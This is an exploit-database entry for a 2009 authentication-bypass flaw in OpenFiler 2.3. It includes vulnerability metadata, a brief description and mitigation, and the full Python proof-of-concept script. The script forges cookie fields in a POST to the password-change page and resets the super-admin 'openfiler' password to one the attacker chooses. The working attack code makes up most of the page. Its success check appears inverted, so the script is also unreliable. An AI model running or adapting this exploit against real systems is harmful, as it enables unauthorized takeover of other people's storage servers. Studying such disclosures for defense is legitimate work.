Exploit code (PoC) for OpenFiler 2.3 (current)

vendor:

OpenFiler

by:

just a nonroot user

7.5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: OpenFiler

Affected Version From: OpenFiler 2.3

Affected Version To: OpenFiler 2.3

Patch Exists: NO

Related CWE: N/A

CPE: a:openfiler:openfiler

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Exploit code (PoC) for OpenFiler 2.3 (current)

This exploit code allows a non-root user to bypass authentication and gain access to the OpenFiler 2.3 system. The code takes the host URL, a username and password as input and then uses a fake password to bypass authentication. If the exploit is successful, the user can login with the provided username and password.

Mitigation:

Ensure that authentication is properly implemented and that all users are required to provide valid credentials before being granted access.

Source

Exploit-DB raw data:

#Exploit code (PoC) for OpenFiler 2.3 (current)
#by just a nonroot user
#http://nonroot.blogspot.com/
#
import urllib,sys,re
#host example: https://192.168.20.5:446/
host=raw_input("OpenFiler system ( include http and /): ")
#Super admin user
user='openfiler'
#What pass do you want?
password='nonroot'
#use it please ;)
fake="myladyastridcita"
data= urllib.urlencode({'current_password':fake , 'passcookie': fake, 'usercookie': user,'new_password': password,'confirm_new_password': password,'userauthenticated':"666"})
response= urllib.urlopen(host+"account/password.html", data)
data=response.read()
lookup=re.compile("successfully").search
match=lookup(data)
if not  match:
    print "Ok, now go and login with user:", user, " and password: ", password, " in ",host
else:
    print "Exploit failed, sorry, go and find some new bug or check this code and fix it!"
    sys.exit(2)
sys.exit(0)

# milw0rm.com [2009-02-03]